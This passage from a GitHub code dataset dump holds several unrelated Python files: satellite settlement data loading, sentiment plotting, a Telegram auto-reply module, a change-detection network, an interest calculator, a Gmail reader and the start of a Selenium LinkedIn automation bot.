\"B12\"]\n\ndef load_s2_image(imagepath, bounds, expected_image_size):\n left, bottom, right, top = bounds\n\n # extract bands and image sizes\n band_stack = []\n for band in BANDS:\n with rasterio.open(os.path.join(imagepath, band + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n band_stack.append(src.read(1, window=patch_window))\n\n # extract dimensions of the B02.jpg band (10m) to rescale other images to this size\n height, width = band_stack[1].shape\n\n size_in_px = expected_image_size // 10\n if height == size_in_px and width == size_in_px:\n\n # bilinearly interpolate all bands to 10m using torch functional resize\n band_stack = [\n resize(torch.from_numpy(b[None].astype(\"int32\")), [height, width]).squeeze(0).numpy() for b in band_stack\n ]\n\n # stack to image [13 x H x W]\n image = np.stack(band_stack)\n\n # valid pixels are where there is no 0 in all bands\n invalid_mask = image.sum(0) == 0\n\n if not np.isnan(image).any():\n\n if not invalid_mask.any():\n\n # prepare metadata for storing a georeferenced patch on disk\n\n # extract transform of the window from a 10m band\n with rasterio.open(os.path.join(imagepath, BANDS[1] + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n win_transform = src.window_transform(patch_window)\n profile = src.profile\n profile[\"width\"], profile[\"height\"], profile[\"count\"] = width, height, len(BANDS)\n profile[\"transform\"] = win_transform\n\n return image, profile\n\n # if image not in correct size or contains invalid data\n return None, None\n\nclass SettlementDataset(Dataset):\n def __init__(self, data_path,\n tile,\n imagesize=640, # imagesize in meter\n segmentation=False,\n overwrite=False\n ):\n # prepare data (is skipped if already present)\n mosaik(data_path=data_path, tile=tile, overwrite=overwrite)\n write_urban_tif_and_shape(data_path, tile, overwrite=overwrite)\n\n # initialization\n self.index = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\"), index_col=0)\n self.imagepath = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n self.imagesize = imagesize\n self.segmentation = segmentation\n\n if segmentation:\n gdf = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"vector\", f\"{tile}.shp\"))\n self.shapes = gdf.loc[gdf[\"a_name\"] == \"Urban\"]\n\n print(\"checking samples...\")\n valid = [self[i] is not None for i in tqdm(range(len(self)))]\n self.index = self.index.loc[np.array(valid)]\n print(f\"dropping {(~np.array(valid)).sum()} invalid samples\")\n\n\n def __len__(self):\n return len(self.index)\n\n def __getitem__(self, item):\n geometry = self.index.iloc[item].geometry\n x,y = geometry.centroid.x, geometry.centroid.y\n\n left, bottom, right, top = x, y, x + self.imagesize, y + self.imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=self.imagesize)\n\n # stop early if loading failed (is checked for \"checking samples above\")\n if s2 is None:\n return None\n\n if self.segmentation:\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n return s2, targets, meta\n else:\n return s2, meta\n \n \n def get_image(self, cx, cy, imagesize):\n\n left, bottom, right, top = cx - imagesize // 2, cy - imagesize // 2, cx + imagesize // 2, cy + imagesize // 2\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=imagesize)\n\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n\n return s2, targets, meta\n \ndef get_center(m):\n pixel_size = m[\"transform\"].a\n x = m[\"transform\"].c\n y = m[\"transform\"].f\n\n cx = x + m[\"width\"] // 2 * pixel_size\n cy = y - m[\"height\"] // 2 * pixel_size\n return cx, cy\n\n\ndef make_grid(polygon, edge_size):\n \"\"\"\n polygon : shapely.geometry\n edge_size : length of the grid cell\n from https://stackoverflow.com/questions/68770508/st-make-grid-method-equivalent-in-python/68778560#68778560\n \"\"\"\n bounds = polygon.bounds\n x_coords = np.arange(bounds[0] + edge_size / 2, bounds[2], edge_size)\n y_coords = np.arange(bounds[1] + edge_size / 2, bounds[3], edge_size)\n combinations = np.array(list(product(x_coords, y_coords)))\n squares = gpd.points_from_xy(combinations[:, 0], combinations[:, 1]).buffer(edge_size / 2, cap_style=3)\n return gpd.GeoSeries(squares[squares.intersects(polygon)])\n\ndef write_urban_tif_and_shape(data_path, tile, urban_class=7,\n erosion_size=3, overwrite=False,\n simplify_radius=10, edge_size = 640):\n \"\"\"\n creates a raster file of urban areas only. these areas are eroded by a certain amount\n creates a shapefile of settlements by vectoriting the eroded raster file\n \"\"\"\n\n labels_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"raster\", f\"{tile}.tif\")\n target_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.tif\")\n target_shp = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\")\n\n os.makedirs(os.path.dirname(target_tif), exist_ok=True)\n\n if os.path.exists(target_tif) and os.path.exists(target_shp) and not overwrite:\n print(f\"files {target_tif} and {target_shp} exist. skipping, specificy overwrite=True to rewrite\")\n return\n\n with rio.open(labels_tif, \"r\") as src:\n lab = (src.read(1) == urban_class)\n lab = binary_opening(lab, footprint=np.ones((erosion_size, erosion_size)))\n lab = np.nan_to_num(lab, nan=255)\n\n profile = src.profile\n profile.update(\n dtype=\"uint8\",\n nodata=\"255\"\n )\n\n with rio.open(target_tif, \"w\", **profile) as dst:\n dst.write(lab, 1)\n print(f\"wrote {target_tif}\")\n\n shapes = features.shapes((lab == 1).astype(\"uint8\"), transform=src.transform)\n\n geoms = [Polygon(record[\"coordinates\"][0]) for (record, i) in shapes]\n gdf = gpd.GeoDataFrame(geometry=geoms, crs=profile[\"crs\"])\n b = gdf.iloc[-1]\n boundary = gpd.GeoDataFrame([1], geometry=[b.geometry], crs=profile[\"crs\"])\n gdf = gdf.iloc[:-2]# drop last row, as it is a polygon of the entire image\n gdf = gdf.dissolve().explode(index_parts=True)\n if simplify_radius > 0:\n gdf.geometry = gdf.geometry.simplify(simplify_radius) # simplify at 10m resolution to avoid pixel corners\n\n # split large polygons into smaller ones\n geometries = []\n for (_, idx), row in gdf.iterrows():\n if row.geometry.area > edge_size**2:\n geoms = make_grid(row.geometry, edge_size=edge_size)\n geoms = gpd.GeoSeries(geoms, crs=profile[\"crs\"])\n split_idx = list(geoms.index)\n geoms.index = [f\"{idx}-{i}\" for i in split_idx]\n geometries.append(geoms)\n else:\n _, idx = row.name\n series = gpd.GeoSeries(row, crs=profile[\"crs\"])\n series.index = [f\"{idx}-0\"]\n geometries.append(series)\n blocks = pd.concat(geometries)\n\n gdf = gpd.clip(blocks, gdf, keep_geom_type=True)\n #msk = (gdf.geometry.type == \"Polygon\") | (gdf.geometry.type == \"MultiPolygon\")\n #multipolys = gdf.loc[]\n #gdf = gdf.loc[msk] # removing GeometryCollections\n\n gdf.to_file(target_shp)\n print(f\"wrote {target_shp}\")\n\ndef mosaik(data_path, tile, overwrite=False):\n target_path = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n os.makedirs(target_path, exist_ok=True)\n bands = glob(os.path.join(data_path, \"Test\", tile, \"*\", \"B*.jp2\"))\n scene = [b.split(\"/\")[-2] for b in bands]\n b = [b.split(\"/\")[-1].replace(\".jp2\", \"\") for b in bands]\n df = pd.DataFrame([bands, scene, b], index=[\"path\", \"scene\", \"band\"]).T\n for band in BANDS:\n trg_file = os.path.join(target_path, f\"{band}.jp2\")\n if os.path.exists(trg_file) and not overwrite:\n print(f\"{trg_file} exists. skipping. specify overwrite=True to regenerate mosaik\")\n continue\n\n df_ = df.loc[df.band == band]\n\n arrs = []\n for idx, row in df_.iterrows():\n with rio.open(row.path, \"r\") as src:\n arrs.append(src.read(1))\n profile = src.profile\n\n arrs = np.stack(arrs).astype(\"float16\")\n arrs[arrs == 0] = np.nan\n mosaik = np.nan_to_num(np.nanmin(arrs,axis=0)).astype(\"uint16\")\n\n with rio.open(trg_file, \"w\", **profile) as dst:\n dst.write(mosaik, 1)\n print(f\"writing {trg_file}\")\n\ndef sample_settlements(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n return_idx_p=False,\n seed=0):\n # makes sure p sums to one\n def normalize(x):\n return (x / x.sum())\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n x, y = geom.centroid.x, geom.centroid.y\n\n distances = []\n for idx, row in data_source.index.iterrows():\n c = row.geometry.centroid\n cx, cy = c.x, c.y\n distances.append(np.sqrt((x - cx) ** 2 + (y - cy) ** 2))\n distances = np.array(distances)\n\n p = normalize(dist_rv.pdf(distances))\n\n idxs = np.random.RandomState(seed).choice(np.arange(len(data_source)), replace=False, p=p, size=num_samples)\n\n batch = np.stack([data_source[idx] for idx in idxs])\n\n\n\n if data_source.segmentation:\n X,y, meta = map(list, zip(*batch))\n batch = (np.stack(X), np.stack(y), meta)\n else:\n batch = np.stack(batch)\n\n if return_idx_p:\n return batch, idxs, p\n else:\n return batch\n \ndef sample_negatives(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n seed=0):\n # makes sure p sums to one\n segmentation = data_source.segmentation\n\n imagesize = data_source.imagesize\n imagepath = data_source.imagepath\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n cx, cy = geom.centroid.x, geom.centroid.y\n\n # sample polar coordinates\n n_coordinates = num_samples*4 # sample more coordinates in case some are invalid\n distances = dist_rv.rvs(n_coordinates, random_state=seed)\n angles = np.random.RandomState(seed).randn(n_coordinates) * 2 * np.pi\n\n X = cx + distances * np.cos(angles)\n Y = cy + distances * np.sin(angles)\n\n batch = []\n targets = []\n metas = []\n for x,y in zip(X,Y):\n left, bottom, right, top = x, y, x + imagesize, y + imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(imagepath, bounds, expected_image_size=imagesize)\n if s2 is not None: # if valid\n\n if segmentation:\n t = rio.features.rasterize(data_source.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n targets.append(t)\n\n batch.append(s2)\n metas.append(meta)\n\n # stop early if sufficient valid samples have been found\n if len(batch) >= num_samples:\n break\n\n if segmentation:\n return np.stack(batch), np.stack(targets), metas\n else:\n return np.stack(batch), metas\n\ndef sample_batch(data_source, target_index, num_shots=10, dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000)):\n num_shots_pos, num_shots_neg = num_shots\n \n pos_batch = sample_settlements(data_source, target_index=target_index, num_samples=num_shots_pos, dist_rv=dist_rv)\n neg_batch = sample_negatives(data_source, target_index=target_index, num_samples=num_shots_neg, dist_rv=dist_rv)\n\n if not data_source.segmentation:\n pos_target = np.ones(pos_batch.shape[0], dtype=int)\n neg_target = np.zeros(pos_batch.shape[0], dtype=int)\n\n return np.vstack([pos_batch, neg_batch]), np.hstack([pos_target, neg_target])\n\n else:\n pos_X, pos_target, pos_meta = pos_batch\n neg_X, neg_target, neg_meta = neg_batch\n\n return np.vstack([pos_X, neg_X]), np.vstack([pos_target, neg_target]), pos_meta + neg_meta\n\n\ndef load_uc2_settlement_data(\n num_shots=(200, 600),\n imagesize=10240,\n target_index=600,\n datapath=\"/data/RepreSent/UC2\",\n savepath=None,\n use_cache=False): # f\"/home/marc/Desktop/uc2_settlements/{target_index}\"\n \n if use_cache and savepath is not None:\n data = torch.load(os.path.join(savepath, 'data.npz'))\n return data[\"X\"], data[\"Y\"], data[\"x_test\"], data[\"y_test\"], data[\"buildings\"], data[\"meta\"]\n\n ds = SettlementDataset(datapath, \"37LBL\", segmentation=True)\n\n x, y, meta_ = ds[target_index]\n cx, cy = get_center(meta_)\n\n x_test, y_test, meta = ds.get_image(cx, cy, imagesize=imagesize)\n\n labelprofile = copy(meta)\n labelprofile.update(\n count=1)\n\n dist = skewcauchy(a=0.999, loc=7500, scale=10000)\n print(\"sampling batch\")\n X, Y, train_metas = sample_batch(ds, target_index=target_index, num_shots=num_shots, dist_rv=dist)\n\n X = torch.from_numpy(X) * 1e-4\n Y = torch.from_numpy(Y)\n\n if savepath is not None:\n os.makedirs(savepath, exist_ok=True)\n\n #gdf.to_file(os.path.join(savepath, \"traintiles.shp\"))\n\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"w\", **meta) as dst:\n dst.write(x_test.astype(\"uint16\"))\n\n with rio.open(os.path.join(savepath, \"existing_labels.tif\"), \"w\", **labelprofile) as dst:\n dst.write(y_test.astype(\"uint16\"), 1)\n\n gdf = gpd.read_file(os.path.join(savepath, \"settlements.shp\"))\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"r\") as src:\n buildings = rio.features.rasterize(gdf.to_crs(src.crs).geometry, out_shape=(src.width, src.height),\n transform=src.transform, all_touched=True)\n\n torch.save(dict(\n X=X,\n Y=Y,\n x_test=x_test,\n y_test=y_test,\n buildings=buildings,\n meta=meta),\n os.path.join(savepath, 'data.npz'))\n\n return X, Y, x_test, y_test, buildings, meta\n\ndef main():\n import matplotlib.pyplot as plt\n from skimage.exposure import equalize_hist\n\n # SEGMENTATION\n plt.tight_layout()\n plt.show()\n\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=True)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 2, figsize=(3*2, 3*X.shape[0]))\n for x,y, axs_row in zip(X,Y, axs):\n ax = axs_row[0]\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_xticks([])\n ax.set_yticks([])\n\n ax = axs_row[1]\n ax.imshow(y)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.tight_layout()\n plt.show()\n\n # CLASSIFICATION\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=False)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 1, figsize=(3, 3*X.shape[0]))\n for x,y, ax in zip(X,Y, axs):\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_title(\"settlement\" if y == 1 else \"non-settlement\")\n ax.set_xticks([])\n ax.set_yticks([])\n\nif __name__ == '__main__':\n main()\n","repo_name":"ridvansalihkuzu/representlib","sub_path":"represent/datamodules/uc2_settlement_module.py","file_name":"uc2_settlement_module.py","file_ext":"py","file_size_in_byte":17004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18401814855","text":"from cConstants import cEPAConstants\nfrom cEnum import eEPA\nimport cPlot3D\n\n\nclass cPlotFrame(cPlot3D.cPlotFrame):\n def __init__(self, iParent, **kwargs):\n cPlot3D.cPlotFrame.__init__(self, iParent, **kwargs)\n\n def initPanel(self, *args, **kwargs):\n self.m_PlotPanel = cPlotPanel(self, **kwargs)\n\n\nclass cPlotPanel(cPlot3D.cPlotPanel):\n\n def __init__(self, iParent, iXAxisItem=eEPA.evaluation, iYAxisItem=eEPA.potency, iZAxisItem=eEPA.activity, iPlotType=eEPA.fundamental, **kwargs):\n cPlot3D.cPlotPanel.__init__(self, iParent, **kwargs)\n\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n self.m_PlotType = eEPA.fundamental\n\n\n def getSentimentEPAIndex(self, iEPA, iSentiment):\n return iEPA + (cEPAConstants.m_Dimensions * iSentiment)\n\n\n # Axis items are the enumerations of the elements in eEPA, so they're basically numbers\n def setAxis(iXAxisItem, iYAxisItem, iZAxisItem):\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n\n def plotEPA(self, iLearnerSamples, iSimulatorSamples):\n self.clearAxes()\n\n if (0 < len(iLearnerSamples)):\n # Learner's sentiments on self and other, green and pink respectively\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"green\", alpha=1, animated=False)\n\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"pink\", alpha=1, animated=False)\n\n if (0 < len(iSimulatorSamples)):\n # Simulator's sentiments on self and other, goldenrod and blue respectively\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"goldenrod\", alpha=1, animated=False)\n\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"blue\", alpha=1, animated=False)\n\n\n self.m_Axes.set_xlabel(cEPAConstants.m_EPALabels[self.m_XAxisItem])\n self.m_Axes.set_ylabel(cEPAConstants.m_EPALabels[self.m_YAxisItem])\n self.m_Axes.set_zlabel(cEPAConstants.m_EPALabels[self.m_ZAxisItem])\n self.redrawAxes()\n","repo_name":"tracydou/EmotionalHandwashingAssistant","sub_path":"lib/bayesact/gui/cPlotEPA3D.py","file_name":"cPlotEPA3D.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12996778931","text":"l1=[]\nn1=int(input(\"\"))\nfor i in range(0,n1):\n a=int(input(\" \"))\n l1.append(a)\nopt=int(input(\"1.delete \\n 2.Insert\"))\nif opt==2:\n a=int(input(\" index value\"))\n b=input(\"value \")\n l1.insert(a,b)\nelse:\n op=int(input(\" 1.delete by value \\n 2. delete by index \\n 3.delete range\"))\n if(op==1):\n k=input(\"enter you want to delete\")\n l1.remove(k)\n elif op==2:\n k=int(input(\"enter index\"))\n del l1[k]\n else:\n st=int(input(\"strating index\"))\n ed=int(input(\"ending value\"))\n for i in range(st,ed+1):\n del l1[i]\n\n\nprint(l1)","repo_name":"Anubhavpandey27/Python_for_ds_assignment","sub_path":"assignment 1/answer 4.py","file_name":"answer 4.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13753823034","text":"# █ █ █ █▄▀ ▄▀█ █▀▄▀█ █▀█ █▀█ █ █\n# █▀█ █ █ █ █▀█ █ ▀ █ █▄█ █▀▄ █▄█\n\n# 🔒 Licensed under the GNU GPLv3\n# 🌐 https://www.gnu.org/licenses/agpl-3.0.html\n# 👤 https://t.me/hikamoru\n\n# meta developer: @hikamorumods\n# meta banner: https://raw.githubusercontent.com/AmoreForever/assets/master/DTWR.jpg\n\nfrom .. import loader, utils\nfrom telethon.tl.types import Message\n\n\n@loader.tds\nclass DTWRMod(loader.Module):\n \"\"\"Module Don't tag wihout reason\"\"\"\n\n strings = {\n \"name\": \"DTWR\",\n \"text\": \"Your custom text\",\n \"username\": \"Input you username without '@'\",\n }\n\n strings_ru = {\n \"text\": \"Кастомный текст\",\n \"username\": \"Введи свой юзернэйм без '@'\",\n }\n\n strings_uz = {\n \"text\": \"Kastom text\",\n \"username\": \"Usernameingizni kiriting, '@' siz\"\n }\n\n def __init__(self):\n self.config = loader.ModuleConfig(\n loader.ConfigValue(\n \"Username\",\n \"username\",\n doc=lambda: self.strings(\"username\"),\n ),\n loader.ConfigValue(\n \"custom_text\",\n \"😫 Please don't tag me without reason\",\n doc=lambda: self.strings(\"text\"),\n ),\n )\n\n @loader.command(ru_docs=\"Конфиг этого модуля\")\n async def cfgdtwrcmd(self, message):\n \"\"\"This module config\"\"\"\n name = self.strings(\"name\")\n await self.allmodules.commands[\"config\"](\n await utils.answer(message, f\"{self.get_prefix()}config {name}\")\n )\n\n @loader.tag(\"only_messages\", \"only_groups\", \"in\")\n async def watcher(self, message: Message):\n\n reply = await message.get_reply_message()\n\n tag = self.config['Username']\n if tag.startswith('@') is False:\n tag = f\"@{tag}\"\n\n if reply:\n return False\n if message.text.lower() == tag:\n await message.reply(self.config[\"custom_text\"])\n await self._client.send_read_acknowledge(\n message.chat_id,\n clear_mentions=True,\n )\n","repo_name":"AmoreForever/amoremods","sub_path":"dtwr.py","file_name":"dtwr.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"38"} +{"seq_id":"22652870187","text":"import paddle\nimport paddle.nn as nn\n\nfrom .layers import Conv7x7\n# from utils.download import download_and_decompress\n# from ops.tlx_basic_pooling import tlx_MaxPool2d, tlx_MaxUnPool2d\n# from utils.load_model import restore_model, load, download_and_decompress\nfrom paddle2tlx.pd2tlx.utils import load_model_cdet\nCDNET_URLS = \"https://paddlers.bj.bcebos.com/pretrained/cd/levircd/weights/cdnet_levircd.pdparams\"\n\nclass CDNet(nn.Layer):\n \"\"\"\n The CDNet implementation based on PaddlePaddle.\n\n The original article refers to\n Pablo F. Alcantarilla, et al., \"Street-View Change Detection with Deconvolut\n ional Networks\"\n (https://link.springer.com/article/10.1007/s10514-018-9734-5).\n\n Args:\n in_channels (int): Number of bands of the input images.\n num_classes (int): Number of target classes.\n \"\"\"\n\n def __init__(self, in_channels, num_classes):\n super(CDNet, self).__init__()\n self.conv1 = Conv7x7(in_channels, 64, norm=True, act=True)\n self.pool1 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv2 = Conv7x7(64, 64, norm=True, act=True)\n self.pool2 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv3 = Conv7x7(64, 64, norm=True, act=True)\n self.pool3 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv4 = Conv7x7(64, 64, norm=True, act=True)\n self.pool4 = nn.MaxPool2D(2, 2, return_mask=True)\n self.conv5 = Conv7x7(64, 64, norm=True, act=True)\n self.upool4 = nn.MaxUnPool2D(2, 2)\n self.conv6 = Conv7x7(64, 64, norm=True, act=True)\n self.upool3 = nn.MaxUnPool2D(2, 2)\n self.conv7 = Conv7x7(64, 64, norm=True, act=True)\n self.upool2 = nn.MaxUnPool2D(2, 2)\n self.conv8 = Conv7x7(64, 64, norm=True, act=True)\n self.upool1 = nn.MaxUnPool2D(2, 2)\n self.conv_out = Conv7x7(64, num_classes, norm=False, act=False)\n\n def forward(self, t1, t2):\n x = paddle.concat([t1, t2], axis=1)\n x, ind1 = self.pool1(self.conv1(x))\n x, ind2 = self.pool2(self.conv2(x))\n x, ind3 = self.pool3(self.conv3(x))\n x, ind4 = self.pool4(self.conv4(x))\n x = self.conv5(self.upool4(x, ind4))\n x = self.conv6(self.upool3(x, ind3))\n x = self.conv7(self.upool2(x, ind2))\n x = self.conv8(self.upool1(x, ind1))\n return [self.conv_out(x)]\n\n\ndef _cdnet(pretrained=None, in_channels=6, num_classes=2):\n model = CDNet(in_channels=in_channels,num_classes=num_classes)\n if pretrained:\n model = load_model_cdet(model, CDNET_URLS, \"cdnet\")\n # weight_path = download_and_decompress(CDNET_URLS)\n # param = paddle.load(weight_path)\n # # print(len([k for k in param.keys()]))\n # model.load_dict(param)\n return model\n","repo_name":"tensorlayer/Paddle2TLX","sub_path":"pd_models/paddlerscd/models/cdnet.py","file_name":"cdnet.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"} +{"seq_id":"45996324274","text":"\r\n\r\nprint(\"*********************************\")\r\nprint(\"*****Olá, Seja bem vindo(a)!*****\")\r\nprint(\"*********************************\")\r\nprint(\"Iremos te auxiliar no cálculo no seu planejamento financeiro!\")\r\nprint('Primeiramente precisamos de alguns dados:')\r\ndef calcular():\r\n while True:\r\n capital = float(input(\"Qual seu valor inicial?\"))\r\n taxa = float(input(\"Qual a taxa de juros da sua aplicação (em %)?\"))\r\n tempo = float(input(\"Por quantos meses seu capital estará sujeito a esse juros?\"))\r\n juros = taxa / 100\r\n\r\n print('Qual cálculo você deseja realizar?')\r\n calculo = int(input('[1] Juros Simples [2] Juros Compostos'))\r\n if (calculo == 1):\r\n simples = capital * juros * tempo\r\n print(f'Esse é o seu capital total: {simples}')\r\n elif (calculo == 2):\r\n composto = capital * (1 + juros) ** tempo\r\n print(f'Esse é o seu capital total: {composto}')\r\n else:\r\n print('Opção invalida! Tente novamente!')\r\n calcular()\r\n break\r\ndef nova_consulta():\r\n repetir = int(input('Deseja realizar uma nova consulta? [1] para SIM ou [2] para NÃO?'))\r\n if repetir == 1:\r\n calcular()\r\n elif repetir == 2:\r\n print('Até a próxima!')\r\n exit()\r\n else:\r\n print('Opção inválida, tente novamente!')\r\n nova_consulta()\r\n\r\ncalcular()\r\nnova_consulta()\r\n\r\n","repo_name":"vansmelof/calculadoradejuros","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73817130670","text":"import logging\n\nimport gmail\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"googleapiclient\").setLevel(logging.ERROR)\nlogger = logging.getLogger('AutoReply')\n\n\ndef main():\n logger.info('AutoReply script started.')\n logger.info('Reading gmail messages')\n info_form_list = gmail.Gmail().read_messages()\n output_file = open('results.txt', 'w')\n for info_form in info_form_list:\n output_file.write(str(info_form))\n output_file.write('\\n<<<-------------->>>\\n')\n output_file.close()\n logger.info('Reading Gmail messages completed. Please check results.txt')\n\nif __name__ == '__main__':\n main()\n","repo_name":"jaideep-khadilkar/InfoProvider","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70570334191","text":"import os\nimport sys\nimport time \nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nimport lxml\nimport re\nimport sqlite3\nfrom sqlite3 import Error as DB_ERROR\nimport random\n\n# Import chromedriver.exe\nplatform = sys.platform\n\nif platform == \"linux\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"webdriver/linux/chromedriver.exe\")\n sys.path.append(\"/home/jarret/.local/lib/python3.6/site-packages/\")\nelif platform == \"win32\":\n chromedriver = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), r\"webdriver\\windows\\chromedriver.exe\")\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException, WebDriverException\n\nclass LinkedIn_Bot:\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.current_page_source = None\n\n def __str__(self):\n return \"LinkedIn_Bot - Created By Jarret Laberdee - Class Object Created To Increase Reach Of Development Web On LinkedIn\"\n\n def create_browser(self):\n \"\"\"Creates a browser instance of webdriver.\"\"\"\n options = webdriver.ChromeOptions()\n options.add_argument(\"--ignore-certificate-errors\")\n options.add_argument(\"--ignore-ssl-errors\")\n self.browser = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)\n\n def get_page_source(self):\n page = BeautifulSoup(self.browser.page_source, features='lxml')\n return page \n\n def close_browser(self):\n self.browser.close()\n\n def navigate_to_url(self, url, sleep_interval):\n self.browser.get(url)\n time.sleep(sleep_interval)\n\n def login(self):\n self.browser.find_element_by_id(\"login-email\").send_keys(self.username)\n self.browser.find_element_by_id(\"login-password\").send_keys(self.password)\n self.browser.find_element_by_id(\"login-submit\").click()\n time.sleep(2)\n\n def navigate_to_network(self):\n self.browser.find_element_by_id(\"mynetwork-tab-icon\").click()\n time.sleep(2)\n\n def compile_people_links(self, page):\n links = []\n for link in page.find_all('a'):\n url = link.get('href')\n if url:\n if '/in/' in url:\n if url not in links:\n links.append(url)\n return links\n\n def scroll_to_bottom(self, num_scrolls):\n \"\"\"Scrolls to the bottom of the page by executing Javascript\"\"\"\n\n SCROLL_PAUSE_TIME = 1.25\n scroll_height_cmd = \"window.scrollTo(0, document.body.scrollHeight);\"\n \n for page in range(num_scrolls):\n last_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n self.browser.execute_script(scroll_height_cmd)\n # self.browser.execute_script(\"alert('Scrolling')\")\n time.sleep(SCROLL_PAUSE_TIME)\n new_height = self.browser.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n return\n last_height = new_height\n\n def store_people(self, url_list):\n people_list = []\n root_url = \"https://www.linkedin.com\"\n for person_object in url_list:\n split_person_object = person_object.replace(\"/\", \" \").replace(\"-\", \" \")\n split_person_object = split_person_object.split()\n person_url = root_url + person_object\n\n if split_person_object:\n if len(split_person_object) ==5:\n first_name = split_person_object[1]\n last_name = 